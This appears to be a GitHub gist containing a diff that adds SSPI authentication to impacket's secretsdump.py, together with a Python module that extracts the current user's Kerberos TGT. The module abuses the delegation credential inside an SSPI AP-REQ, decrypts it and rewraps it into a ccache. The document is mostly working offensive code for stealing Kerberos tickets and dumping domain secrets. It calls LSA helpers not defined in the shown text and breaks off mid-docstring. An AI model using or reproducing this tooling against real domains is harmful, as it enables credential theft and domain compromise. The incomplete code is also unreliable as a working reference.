Skip to content

Instantly share code, notes, and snippets.

@snovvcrash
Last active January 17, 2024 00:56
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save snovvcrash/ff867dbd922ff2c36f480c0a61819f29 to your computer and use it in GitHub Desktop.
Save snovvcrash/ff867dbd922ff2c36f480c0a61819f29 to your computer and use it in GitHub Desktop.
diff --git a/examples/secretsdump.py b/examples/secretsdump.py
index a881a8ce..df72fd30 100755
--- a/examples/secretsdump.py
+++ b/examples/secretsdump.py
@@ -397,6 +397,7 @@ if __name__ == '__main__':
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication'
' (128 or 256 bits)')
group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')
+ group.add_argument('-sspi', action="store_true", help='Use Windows Integrated Authentication (SSPI)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
@@ -465,7 +466,7 @@ if __name__ == '__main__':
Keytab.loadKeysFromKeytab(options.keytab, username, domain, options)
options.k = True
- if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
+ if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None and options.sspi is False:
from getpass import getpass
password = getpass("Password:")
@@ -473,6 +474,24 @@ if __name__ == '__main__':
if options.aesKey is not None:
options.k = True
+ if options.sspi:
+ import platform
+ if platform.system().lower() != 'windows':
+ logging.error('Cannot use SSPI on non-Windows platform')
+ sys.exit(1)
+ import random, string, ntpath, tempfile
+ from impacket.sspi import get_tgt
+ dcName = os.environ['LOGONSERVER'].strip('\\') + f'.{os.environ["USERDNSDOMAIN"]}'
+ targetSPN = f'HOST/{dcName}'
+ logging.debug(f'Trying to get TGS for {repr(targetSPN)} via SSPI')
+ ccache = get_tgt(targetSPN)
+ ccacheName = ''.join([random.choice(string.ascii_letters) for _ in range(8)]) + '.ccache'
+ ccachePath = ntpath.join(tempfile.gettempdir(), ccacheName)
+ logging.debug(f'Saving temporary Kerberos Cache: {ccachePath}')
+ ccache.saveFile(ccachePath)
+ os.environ['KRB5CCNAME'] = ccachePath
+ options.k = options.no_pass = True
+
dumper = DumpSecrets(remoteName, username, password, domain, options)
try:
dumper.dump()
@@ -481,3 +500,7 @@ if __name__ == '__main__':
             import traceback
             traceback.print_exc()
         logging.error(e)
+    finally:
+        if options.sspi:
+            logging.debug(f'Removing temporary Kerberos Cache: {ccachePath}')
+            os.remove(ccachePath)
# Reference: https://github.com/ly4k/Certipy/tree/main/certipy/lib/sspi
# Author: https://twitter.com/ly4k_
import os
import io
import enum
import string
import functools
from math import gcd
from typing import Dict
from struct import pack, unpack
from ctypes import (
POINTER,
Structure,
WinError,
addressof,
byref,
c_byte,
c_char,
c_char_p,
c_int16,
c_int32,
c_longlong,
c_ubyte,
c_uint16,
c_uint32,
c_void_p,
cast,
create_string_buffer,
pointer,
sizeof,
string_at,
windll
)
from asn1crypto import core
from unicrypto import hmac as HMAC
from unicrypto.hashlib import md4
from unicrypto.hashlib import md5 as MD5
from unicrypto.hashlib import sha1 as SHA
from unicrypto.pbkdf2 import pbkdf2 as PBKDF2
from unicrypto.symmetric import AES, DES, MODE_CBC, MODE_ECB
from unicrypto.symmetric import RC4 as ARC4
from unicrypto.symmetric import TDES as DES3
from impacket.krb5.ccache import CCache
# -- kerberos.py -----------------------------------------------------
def submit_ticket(ticket_data: bytes):
    """Hand ``ticket_data`` to the LSA "kerberos" authentication package.

    Returns True on success and raises the error produced by
    ``get_lsa_error`` when the package reports a non-zero status.
    """
    handle = LsaConnectUntrusted()
    package_id = LsaLookupAuthenticationPackage(handle, "kerberos")
    request = submit_tkt_helper(ticket_data, logonid=0)
    reply, status, reply_ptr = LsaCallAuthenticationPackage(
        handle, package_id, request
    )
    if status != 0:
        raise get_lsa_error(status)
    # Only a non-empty reply has a buffer that must be released.
    if len(reply) > 0:
        LsaFreeReturnBuffer(reply_ptr)
    return True
def get_tgt(target: str) -> CCache:
    """Build a credential cache from the delegation credential SSPI emits.

    A Kerberos security context is initialised for ``target`` with the
    DELEGATE flag, the session key of the matching ticket is fetched from
    the LSA, and the KRB-CRED carried inside the AP-REQ authenticator
    checksum is decrypted and re-wrapped with ``etype`` 0 so it can be
    loaded into a ``CCache``.

    Raises:
        Exception: if InitializeSecurityContext does not return OK or
            CONTINUE_NEEDED, if the authenticator checksum is missing or
            is not of type 0x8003, or if the delegation flag is not set.
    """
    ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND)
    res, ctx, data, _, _ = InitializeSecurityContext(
        ctx,
        target,
        token=None,
        ctx=ctx,
        flags=ISC_REQ.DELEGATE | ISC_REQ.MUTUAL_AUTH | ISC_REQ.ALLOCATE_MEMORY,
    )
    # Fail loudly instead of falling through without a cache: callers use
    # the returned object immediately.
    if not (res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED):
        raise Exception("InitializeSecurityContext failed: %s" % (res,))

    lsa_handle = LsaConnectUntrusted()
    kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")
    raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target)
    key = Key(raw_ticket["Key"]["KeyType"], raw_ticket["Key"]["Key"])

    token = InitialContextToken.load(data[0][1])
    ticket = AP_REQ(token.native["innerContextToken"]).native
    cipher = _enctype_table[ticket["authenticator"]["etype"]]

    # Key usage 11: AP-REQ authenticator (RFC 4120, section 7.5.1).
    dec_authenticator = cipher.decrypt(key, 11, ticket["authenticator"]["cipher"])
    authenticator = Authenticator.load(dec_authenticator).native

    # "cksum" is optional in the Authenticator; treat absence like a wrong type.
    cksum = authenticator["cksum"]
    if cksum is None or cksum["cksumtype"] != 0x8003:
        raise Exception("Bad checksum")
    checksum_data = AuthenticatorChecksum.from_bytes(cksum["checksum"])
    if ChecksumFlags.GSS_C_DELEG_FLAG not in checksum_data.flags:
        raise Exception("Delegation flag not set")

    cred_orig = KRB_CRED.load(checksum_data.delegation_data).native
    # Key usage 14: KRB-CRED encrypted part (RFC 4120, section 7.5.1).
    dec_cred_part = cipher.decrypt(key, 14, cred_orig["enc-part"]["cipher"])

    # Re-wrap the decrypted part with etype 0 so the KRB-CRED carries it in
    # the clear.
    plain_enc_part = EncryptedData({"etype": 0, "cipher": dec_cred_part})
    krb_cred = KRB_CRED(
        {
            "pvno": cred_orig["pvno"],
            "msg-type": cred_orig["msg-type"],
            "tickets": cred_orig["tickets"],
            "enc-part": plain_enc_part,
        }
    )

    ccache = CCache()
    ccache.fromKRBCRED(krb_cred.dump())
    return ccache
def get_tgs(target: str) -> CCache:
    """Return a credential cache holding the service ticket for ``target``.

    The ticket is pulled from the LSA via ``extract_ticket`` and converted
    with ``CCache.fromKRBCRED``.
    """
    # NOTE(review): the original indentation of this function was lost; the
    # nesting below assumes only the four statements before the
    # "can be skipped - end" marker belong to the ``if`` — confirm.
    # can be skipped - start
    ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND)
    res, ctx, data, _, _ = InitializeSecurityContext(
        ctx,
        target,
        token=None,
        ctx=ctx,
        flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION,
    )
    if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
        sec_struct = SecPkgContext_SessionKey()
        QueryContextAttributes(ctx, SECPKG_ATTR.SESSION_KEY, sec_struct)
        # The two expressions below are evaluated and their results discarded.
        sec_struct.Buffer
        InitialContextToken.load(data[0][1]).native["innerContextToken"]
    # can be skipped - end
    lsa_handle = LsaConnectUntrusted()
    kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos")
    raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target)
    krb_cred = KRB_CRED.load(raw_ticket["Ticket"])
    ccache = CCache()
    ccache.fromKRBCRED(krb_cred.dump())
    return ccache
# -- structs.py ------------------------------------------------------
def _to_pascal_case(snake_str: str) -> str:
components = snake_str.split("_")
return "".join(x.title() for x in components)
def _high_bit(value):
return value.bit_length() - 1
def _decompose(flag, value):
not_covered = value
negative = value < 0
members = []
for member in flag:
member_value = member.value
if member_value and member_value & value == member_value:
members.append(member)
not_covered &= ~member_value
if not negative:
tmp = not_covered
while tmp:
flag_value = 2 ** _high_bit(tmp)
if flag_value in flag._value2member_map_:
members.append(flag._value2member_map_[flag_value])
not_covered &= ~flag_value
tmp &= ~flag_value
if not members and value in flag._value2member_map_:
members.append(flag._value2member_map_[value])
members.sort(key=lambda m: m._value_, reverse=True)
if len(members) > 1 and members[0].value == value:
members.pop(0)
return members, not_covered
class IntFlag(enum.IntFlag):
    """``enum.IntFlag`` with PascalCase string rendering and list helpers."""

    def to_list(self):
        """Return the members that make up this value."""
        parts, _ = _decompose(self.__class__, self._value_)
        return parts

    def to_str_list(self):
        """Return ``str()`` of every member that makes up this value."""
        return [str(part) for part in self.to_list()]

    def __str__(self):
        # A named member renders as its own name in PascalCase.
        if self._name_ is not None:
            return _to_pascal_case(self._name_)
        parts, _ = _decompose(self.__class__, self._value_)
        if len(parts) == 1 and parts[0]._name_ is None:
            return repr(parts[0]._value_)
        rendered = [_to_pascal_case(str(p._name_ or p._value_)) for p in parts]
        return ", ".join(rendered)

    def __repr__(self):
        return str(self)
# Value passed as "tag_type" in the ASN.1 field definitions of this module.
TAG = "explicit"
# First element of the ``explicit = (APPLICATION, n)`` class attributes used
# by the ASN.1 message classes of this module.
APPLICATION = 1
class krb5int32(core.Integer):
    """Integer type used by fields such as ``etype``, ``pvno`` and ``name-type``."""

    pass


class krb5uint32(core.Integer):
    """Integer type used by fields such as ``kvno``, ``keytype`` and ``seq-number``."""

    pass


class KerberosString(core.GeneralString):
    """GeneralString subtype used for realm and principal name components."""

    pass


class SequenceOfKerberosString(core.SequenceOf):
    """SEQUENCE OF ``KerberosString``."""

    _child_spec = KerberosString


class Realm(KerberosString):
    """``KerberosString`` subtype used for realm fields."""

    pass
class PrincipalName(core.Sequence):
    """Sequence of a name type ([0]) and a list of name strings ([1])."""

    _fields = [
        ("name-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("name-string", SequenceOfKerberosString, {"tag_type": TAG, "tag": 1}),
    ]
class KerberosTime(core.GeneralizedTime):
    """GeneralizedTime subtype used for the ``ctime`` field of ``Authenticator``."""

    pass
class AuthorizationDataElement(core.Sequence):
    """Single authorization-data entry: a type ([0]) and opaque data ([1])."""

    _fields = [
        ("ad-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("ad-data", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]
class AuthorizationData(core.SequenceOf):
    """SEQUENCE OF ``AuthorizationDataElement``."""

    _child_spec = AuthorizationDataElement
class APOptions(core.BitString):
    """Bit string for the ``ap-options`` field of ``AP_REQ``; names bits 0-2."""

    _map = {
        0: "reserved",
        1: "use-session-key",
        2: "mutual-required",
    }
class EncryptedData(core.Sequence):
    """Encryption type ([0]), optional key version ([1]) and ciphertext ([2])."""

    _fields = [
        ("etype", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("kvno", krb5uint32, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("cipher", core.OctetString, {"tag_type": TAG, "tag": 2}),
    ]
class EncryptionKey(core.Sequence):
    """Key type ([0]) and raw key bytes ([1])."""

    _fields = [
        ("keytype", krb5uint32, {"tag_type": TAG, "tag": 0}),
        ("keyvalue", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]
class Ticket(core.Sequence):
    """Ticket structure, explicitly tagged ``(APPLICATION, 1)``."""

    explicit = (APPLICATION, 1)
    _fields = [
        ("tkt-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("realm", Realm, {"tag_type": TAG, "tag": 1}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
    ]
class SequenceOfTicket(core.SequenceOf):
    """SEQUENCE OF ``Ticket``; type of the ``tickets`` field of ``KRB_CRED``."""

    _child_spec = Ticket
class Checksum(core.Sequence):
    """Checksum type ([0]) and checksum bytes ([1])."""

    _fields = [
        ("cksumtype", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("checksum", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]
class Authenticator(core.Sequence):
    """Authenticator structure, explicitly tagged ``(APPLICATION, 2)``.

    ``cksum``, ``subkey``, ``seq-number`` and ``authorization-data`` are
    optional.
    """

    explicit = (APPLICATION, 2)
    _fields = [
        ("authenticator-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 1}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 2}),
        ("cksum", Checksum, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("cusec", krb5int32, {"tag_type": TAG, "tag": 4}),
        ("ctime", KerberosTime, {"tag_type": TAG, "tag": 5}),
        ("subkey", EncryptionKey, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("seq-number", krb5uint32, {"tag_type": TAG, "tag": 7, "optional": True}),
        (
            "authorization-data",
            AuthorizationData,
            {"tag_type": TAG, "tag": 8, "optional": True},
        ),
    ]
class AP_REQ(core.Sequence):
    """AP-REQ message, explicitly tagged ``(APPLICATION, 14)``.

    The ``authenticator`` field is an ``EncryptedData`` wrapper.
    """

    explicit = (APPLICATION, 14)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),
        ("ap-options", APOptions, {"tag_type": TAG, "tag": 2}),
        ("ticket", Ticket, {"tag_type": TAG, "tag": 3}),
        ("authenticator", EncryptedData, {"tag_type": TAG, "tag": 4}),
    ]
class KRB_CRED(core.Sequence):
    """KRB-CRED message, explicitly tagged ``(APPLICATION, 22)``.

    Holds a list of tickets plus an ``EncryptedData`` ``enc-part``.
    """

    explicit = (APPLICATION, 22)
    _fields = [
        ("pvno", core.Integer, {"tag_type": TAG, "tag": 0}),
        ("msg-type", core.Integer, {"tag_type": TAG, "tag": 1}),
        ("tickets", SequenceOfTicket, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
    ]
class MechType(core.ObjectIdentifier):
    """Object identifier of a security mechanism, mapped to a readable name.

    The mapped name "KRB5 - Kerberos 5" is the key ``InitialContextToken``
    uses to select ``AP_REQ`` for its inner token.
    """

    _map = {
        "1.3.6.1.4.1.311.2.2.10": "NTLMSSP - Microsoft NTLM Security Support Provider",
        "1.2.840.48018.1.2.2": "MS KRB5 - Microsoft Kerberos 5",
        "1.2.840.113554.1.2.2": "KRB5 - Kerberos 5",
        "1.2.840.113554.1.2.2.3": "KRB5 - Kerberos 5 - User to User",
        "1.3.6.1.4.1.311.2.2.30": "NEGOEX - SPNEGO Extended Negotiation Security Mechanism",
    }
class InitialContextToken(core.Sequence):
    """Outer token wrapping a mechanism OID and the mechanism's inner token.

    The spec of ``innerContextToken`` is chosen from ``_oid_specs`` based on
    the value of ``thisMech``.
    """

    class_ = 1
    tag = 0
    _fields = [
        ("thisMech", MechType, {"optional": False}),
        # NOTE(review): presumably absorbs the bytes that sit between the
        # mechanism OID and the inner token — confirm against the wire format.
        ("unk_bool", core.Boolean, {"optional": False}),
        ("innerContextToken", core.Any, {"optional": False}),
    ]
    _oid_pair = ("thisMech", "innerContextToken")
    _oid_specs = {
        "KRB5 - Kerberos 5": AP_REQ,
    }
class ChecksumFlags(enum.IntFlag):
    """Flag bits stored in the 4-byte flags field of ``AuthenticatorChecksum``."""

    GSS_C_DELEG_FLAG = 1
    GSS_C_MUTUAL_FLAG = 2
    GSS_C_REPLAY_FLAG = 4
    GSS_C_SEQUENCE_FLAG = 8
    GSS_C_CONF_FLAG = 16
    GSS_C_INTEG_FLAG = 32
    GSS_C_DCE_STYLE = 0x1000


class AuthenticatorChecksum:
    """Parsed form of the checksum payload carried in an authenticator.

    Layout (little-endian): 4-byte binding length, channel binding,
    4-byte flags; when ``GSS_C_DELEG_FLAG`` is set a 2-byte delegation
    option, 2-byte delegation length and the delegation data follow;
    anything left over is kept in ``extensions``.
    """

    def __init__(self):
        self.length_of_binding = None
        self.channel_binding = None
        self.flags = None
        self.delegation = None
        self.delegation_length = None
        self.delegation_data = None
        self.extensions = None

    @staticmethod
    def _serialize(value):
        """Return ``value`` as bytes.

        ``from_buffer`` stores raw bytes, while callers may also assign
        objects exposing a ``to_bytes()`` method; accept both.
        """
        if isinstance(value, (bytes, bytearray, memoryview)):
            return bytes(value)
        return value.to_bytes()

    @staticmethod
    def from_bytes(data):
        """Parse a checksum payload from a bytes object."""
        return AuthenticatorChecksum.from_buffer(io.BytesIO(data))

    @staticmethod
    def from_buffer(buffer):
        """Parse a checksum payload from a binary file-like object."""

        def read_uint(size):
            return int.from_bytes(buffer.read(size), byteorder="little", signed=False)

        ac = AuthenticatorChecksum()
        ac.length_of_binding = read_uint(4)
        ac.channel_binding = buffer.read(ac.length_of_binding)
        ac.flags = ChecksumFlags(read_uint(4))
        if ac.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
            ac.delegation = bool(read_uint(2))
            ac.delegation_length = read_uint(2)
            ac.delegation_data = buffer.read(ac.delegation_length)
        ac.extensions = buffer.read()
        return ac

    def to_bytes(self):
        """Serialize back to the layout read by ``from_buffer``."""
        chunks = [
            len(self.channel_binding).to_bytes(4, byteorder="little", signed=False),
            self.channel_binding,
            int(self.flags).to_bytes(4, byteorder="little", signed=False),
        ]
        if self.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
            delegation_data = self._serialize(self.delegation_data)
            chunks.append(
                int(self.delegation).to_bytes(2, byteorder="little", signed=False)
            )
            chunks.append(
                len(delegation_data).to_bytes(2, byteorder="little", signed=False)
            )
            chunks.append(delegation_data)
        if self.extensions:
            chunks.append(self._serialize(self.extensions))
        return b"".join(chunks)
# -- encryption.py ---------------------------------------------------
def get_random_bytes(lenBytes):
    """Return ``lenBytes`` random bytes from ``os.urandom``."""
    return os.urandom(lenBytes)
class Enctype(object):
    """Numeric encryption type identifiers; keys of ``_enctype_table``."""

    DES_CRC = 1
    DES_MD4 = 2
    DES_MD5 = 3
    DES3 = 16
    AES128 = 17
    AES256 = 18
    RC4 = 23
class Cksumtype(object):
    """Numeric checksum type identifiers; keys of ``_checksum_table``."""

    CRC32 = 1
    MD4 = 2
    MD4_DES = 3
    MD5 = 7
    MD5_DES = 8
    SHA1 = 9
    SHA1_DES3 = 12
    SHA1_AES128 = 15
    SHA1_AES256 = 16
    HMAC_MD5 = -138
class InvalidChecksum(ValueError):
    """Raised when a ciphertext MAC or a checksum does not verify."""

    pass
def _zeropad(s, padsize):
padlen = (padsize - (len(s) % padsize)) % padsize
return s + b"\x00" * padlen
def _xorbytes(b1, b2):
assert len(b1) == len(b2)
t1 = int.from_bytes(b1, byteorder="big", signed=False)
t2 = int.from_bytes(b2, byteorder="big", signed=False)
return (t1 ^ t2).to_bytes(len(b1), byteorder="big", signed=False)
def _mac_equal(mac1, mac2):
assert len(mac1) == len(mac2)
res = 0
for x, y in zip(mac1, mac2):
res |= x ^ y
return res == 0
def _nfold(str, nbytes):
def rotate_right(str, nbits):
num = int.from_bytes(str, byteorder="big", signed=False)
size = len(str) * 8
nbits %= size
body = num >> nbits
remains = (num << (size - nbits)) - (body << size)
return (body + remains).to_bytes(len(str), byteorder="big", signed=False)
def add_ones_complement(str1, str2):
n = len(str1)
v = []
for i in range(0, len(str1), 1):
t = str1[i] + str2[i]
v.append(t)
while any(x & ~0xFF for x in v):
v = [(v[i - n + 1] >> 8) + (v[i] & 0xFF) for i in range(n)]
return b"".join(x.to_bytes(1, byteorder="big", signed=False) for x in v)
slen = len(str)
lcm = int(nbytes * slen / gcd(nbytes, slen))
bigstr = b"".join((rotate_right(str, 13 * i) for i in range(int(lcm / slen))))
slices = (bigstr[p : p + nbytes] for p in range(0, lcm, nbytes))
return functools.reduce(add_ones_complement, slices)
def _is_weak_des_key(keybytes):
return keybytes in (
b"\x01\x01\x01\x01\x01\x01\x01\x01",
b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE",
b"\x1F\x1F\x1F\x1F\x0E\x0E\x0E\x0E",
b"\xE0\xE0\xE0\xE0\xF1\xF1\xF1\xF1",
b"\x01\xFE\x01\xFE\x01\xFE\x01\xFE",
b"\xFE\x01\xFE\x01\xFE\x01\xFE\x01",
b"\x1F\xE0\x1F\xE0\x0E\xF1\x0E\xF1",
b"\xE0\x1F\xE0\x1F\xF1\x0E\xF1\x0E",
b"\x01\xE0\x01\xE0\x01\xF1\x01\xF1",
b"\xE0\x01\xE0\x01\xF1\x01\xF1\x01",
b"\x1F\xFE\x1F\xFE\x0E\xFE\x0E\xFE",
b"\xFE\x1F\xFE\x1F\xFE\x0E\xFE\x0E",
b"\x01\x1F\x01\x1F\x01\x0E\x01\x0E",
b"\x1F\x01\x1F\x01\x0E\x01\x0E\x01",
b"\xE0\xFE\xE0\xFE\xF1\xFE\xF1\xFE",
b"\xFE\xE0\xFE\xE0\xFE\xF1\xFE\xF1",
)
class _EnctypeProfile(object):
@classmethod
def random_to_key(cls, seed):
if len(seed) != cls.seedsize:
raise ValueError("Wrong seed length")
return Key(cls.enctype, seed)
class _SimplifiedEnctype(_EnctypeProfile):
    """Profile built on key derivation plus an HMAC over the plaintext.

    Subclasses provide ``blocksize``, ``padsize``, ``macsize``, ``seedsize``,
    ``hashmod``, ``basic_encrypt`` and ``basic_decrypt``.
    """

    @classmethod
    def derive(cls, key, constant):
        """Derive a new key from ``key`` and the byte string ``constant``.

        The constant is n-folded to one block and encrypted repeatedly, each
        output feeding the next round, until ``seedsize`` bytes are available.
        """
        plaintext = _nfold(constant, cls.blocksize)
        rndseed = b""
        while len(rndseed) < cls.seedsize:
            ciphertext = cls.basic_encrypt(key, plaintext)
            rndseed += ciphertext
            plaintext = ciphertext
        return cls.random_to_key(rndseed[0 : cls.seedsize])

    @classmethod
    def encrypt(cls, key, keyusage, plaintext, confounder):
        """Encrypt ``plaintext`` and append a truncated HMAC.

        A random confounder of one block is generated when ``confounder`` is
        None. The HMAC is computed over confounder + zero-padded plaintext.
        """
        # Integrity (0x55) and encryption (0xAA) keys for this key usage.
        ki = cls.derive(key, pack(">IB", keyusage, 0x55))
        ke = cls.derive(key, pack(">IB", keyusage, 0xAA))
        if confounder is None:
            confounder = get_random_bytes(cls.blocksize)
        basic_plaintext = confounder + _zeropad(plaintext, cls.padsize)
        hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
        return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize]

    @classmethod
    def decrypt(cls, key, keyusage, ciphertext):
        """Verify and decrypt ``ciphertext``; return the plaintext without confounder.

        Raises:
            ValueError: if the ciphertext is too short or badly padded.
            InvalidChecksum: if the trailing MAC does not match.
        """
        ki = cls.derive(key, pack(">IB", keyusage, 0x55))
        ke = cls.derive(key, pack(">IB", keyusage, 0xAA))
        if len(ciphertext) < cls.blocksize + cls.macsize:
            raise ValueError("ciphertext too short")
        basic_ctext, mac = ciphertext[: -cls.macsize], ciphertext[-cls.macsize :]
        if len(basic_ctext) % cls.padsize != 0:
            raise ValueError("ciphertext does not meet padding requirement")
        basic_plaintext = cls.basic_decrypt(ke, basic_ctext)
        hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
        expmac = hmac[: cls.macsize]
        if not _mac_equal(mac, expmac):
            raise InvalidChecksum("ciphertext integrity failure")
        return basic_plaintext[cls.blocksize :]

    @classmethod
    def prf(cls, key, string):
        """Pseudo-random function: encrypt the truncated hash of ``string``.

        The hash is truncated to the largest multiple of ``blocksize``.
        """
        hashval = cls.hashmod(string).digest()
        # Compute the kept length explicitly: slicing with ``[:-0]`` would
        # return an empty string when the digest is already block-aligned.
        usable = len(hashval) - (len(hashval) % cls.blocksize)
        truncated = hashval[:usable]
        kp = cls.derive(key, b"prf")
        return cls.basic_encrypt(kp, truncated)
class _DESCBC(_SimplifiedEnctype):
    """DES-CBC profile with an MD5 checksum embedded in the plaintext."""

    enctype = Enctype.DES_MD5
    keysize = 8
    seedsize = 8
    blocksize = 8
    padsize = 8
    macsize = 16
    hashmod = MD5

    @classmethod
    def encrypt(cls, key, keyusage, plaintext, confounder):
        """Encrypt confounder + checksum + zero-padded plaintext with ``key``.

        The checksum is computed with the checksum field zeroed and then
        written into that field. ``keyusage`` is not used by this profile.
        """
        if confounder is None:
            confounder = get_random_bytes(cls.blocksize)
        # bytes, not str: everything handled here is binary data.
        basic_plaintext = (
            confounder + b"\x00" * cls.macsize + _zeropad(plaintext, cls.padsize)
        )
        # hashmod is called directly, as everywhere else in this module.
        checksum = cls.hashmod(basic_plaintext).digest()
        basic_plaintext = (
            basic_plaintext[: len(confounder)]
            + checksum
            + basic_plaintext[len(confounder) + len(checksum) :]
        )
        return cls.basic_encrypt(key, basic_plaintext)

    @classmethod
    def decrypt(cls, key, keyusage, ciphertext):
        """Decrypt ``ciphertext`` and verify the embedded checksum.

        Raises:
            ValueError: if the ciphertext is too short.
            InvalidChecksum: if the embedded checksum does not match.
        """
        if len(ciphertext) < cls.blocksize + cls.macsize:
            raise ValueError("ciphertext too short")
        complex_plaintext = cls.basic_decrypt(key, ciphertext)
        confounder = complex_plaintext[: cls.padsize]
        mac = complex_plaintext[cls.padsize : cls.padsize + cls.macsize]
        message = complex_plaintext[cls.padsize + cls.macsize :]
        expmac = cls.hashmod(confounder + b"\x00" * cls.macsize + message).digest()
        if not _mac_equal(mac, expmac):
            raise InvalidChecksum("ciphertext integrity failure")
        return message

    @classmethod
    def mit_des_string_to_key(cls, string, salt):
        """Derive a DES key from the byte strings ``string`` and ``salt``."""

        def fixparity(deskey):
            # Keep the top 7 bits of each byte and set the low bit so that
            # the byte has odd parity.
            fixed = bytearray()
            for byte in deskey:
                high = byte & 0xFE
                fixed.append(high | 1 if bin(high).count("1") % 2 == 0 else high)
            return bytes(fixed)

        def addparity(l1):
            # Shift each 7-bit value left and add an odd-parity bit.
            temp = list()
            for byte in l1:
                if (bin(byte).count("1") % 2) == 0:
                    byte = (byte << 1) | 0b00000001
                else:
                    byte = (byte << 1) & 0b11111110
                temp.append(byte)
            return temp

        def XOR(l1, l2):
            return [(b1 ^ b2) & 0b01111111 for b1, b2 in zip(l1, l2)]

        def flip_weak(keybytes):
            # bytes are immutable: rebuild the key with the last byte changed.
            return keybytes[:7] + bytes([keybytes[7] ^ 0xF0])

        odd = True
        s = string + salt
        tempstring = [0, 0, 0, 0, 0, 0, 0, 0]
        s = s + b"\x00" * (8 - (len(s) % 8))
        for block in [s[i : i + 8] for i in range(0, len(s), 8)]:
            # Drop the most significant bit of every byte.
            temp56 = [byte & 0b01111111 for byte in block]
            if not odd:
                # Every second block has its 56-bit string reversed.
                bintemp = "".join((bin(byte)[2:]).rjust(7, "0") for byte in temp56)
                bintemp = bintemp[::-1]
                temp56 = [
                    int(bintemp[i : i + 7], 2) for i in range(0, len(bintemp), 7)
                ]
            odd = not odd
            tempstring = XOR(tempstring, temp56)
        tempkey = bytes(addparity(tempstring))
        if _is_weak_des_key(tempkey):
            tempkey = flip_weak(tempkey)
        cipher = DES(tempkey, MODE_CBC, tempkey)
        checksumkey = cipher.encrypt(s)[-8:]
        checksumkey = fixparity(checksumkey)
        if _is_weak_des_key(checksumkey):
            checksumkey = flip_weak(checksumkey)
        return Key(cls.enctype, checksumkey)

    @classmethod
    def basic_encrypt(cls, key, plaintext):
        """DES-CBC encrypt with an all-zero IV; input must be block-aligned."""
        assert len(plaintext) % 8 == 0
        des = DES(key.contents, MODE_CBC, b"\x00" * 8)
        return des.encrypt(plaintext)

    @classmethod
    def basic_decrypt(cls, key, ciphertext):
        """DES-CBC decrypt with an all-zero IV; input must be block-aligned."""
        assert len(ciphertext) % 8 == 0
        des = DES(key.contents, MODE_CBC, b"\x00" * 8)
        return des.decrypt(ciphertext)

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Derive a key from ``string`` and ``salt``; ``params`` must be empty.

        Raises:
            ValueError: if ``params`` is anything but None or an empty string.
        """
        # Accept an empty bytes object as well as the empty str.
        if params not in (None, "", b""):
            raise ValueError("Invalid DES string-to-key parameters")
        key = cls.mit_des_string_to_key(string, salt)
        return key
class _DES3CBC(_SimplifiedEnctype):
    """Triple-DES CBC profile with a SHA-1 HMAC."""

    enctype = Enctype.DES3
    keysize = 24
    seedsize = 21
    blocksize = 8
    padsize = 8
    macsize = 20
    hashmod = SHA

    @classmethod
    def random_to_key(cls, seed):
        """Expand a 21-byte seed into a 24-byte key (three 7-to-8 byte expansions).

        Raises:
            ValueError: if ``seed`` is not 21 bytes long.
        """

        def expand(seed):
            def parity(b):
                # Clear the low bit, then set it if needed for odd parity.
                b &= ~1
                return b if bin(b & ~1).count("1") % 2 else b | 1

            assert len(seed) == 7
            firstbytes = [parity(b & ~1) for b in seed]
            # The eighth byte collects the low bit of each of the seven
            # seed bytes.
            lastbyte = parity(sum((seed[i] & 1) << i + 1 for i in range(7)))
            keybytes = bytes(firstbytes + [lastbyte])
            if _is_weak_des_key(keybytes):
                # bytes are immutable: rebuild with the last byte changed.
                keybytes = keybytes[:7] + bytes([keybytes[7] ^ 0xF0])
            return keybytes

        if len(seed) != 21:
            raise ValueError("Wrong seed length")
        k1, k2, k3 = expand(seed[:7]), expand(seed[7:14]), expand(seed[14:])
        return Key(cls.enctype, k1 + k2 + k3)

    @classmethod
    def string_to_key(cls, string, salt, params):
        """Derive a key from ``string`` and ``salt``; ``params`` must be empty.

        Raises:
